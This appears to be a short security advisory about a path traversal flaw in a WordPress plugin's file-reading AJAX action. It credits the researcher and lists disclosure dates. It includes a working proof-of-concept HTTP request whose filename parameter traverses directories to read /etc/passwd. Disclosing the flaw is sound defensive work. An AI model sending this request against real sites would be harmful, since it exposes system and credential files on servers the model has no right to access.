The plugin does not sanitise or validate the user input which is appended to system paths before using it in various actions, such as to read arbitrary files from the server. This allows high privilege users such as administrator to access any file on the web server outside of the blog directory via a path traversal attack.
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 99 Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: https://example.com/wp-admin/admin.php?page=aceide Accept-Language: en-US,en;q=0.9 Cookie: [admin+] Connection: close action=aceide_get_file&filename=../../../../../etc/passwd&_wpnonce=26b6f841c9
Shreya Pohekar of Codevigilant Project
Yes
2021-07-24 (about 1 years ago)
2021-07-24 (about 1 years ago)
2022-04-12 (about 1 years ago)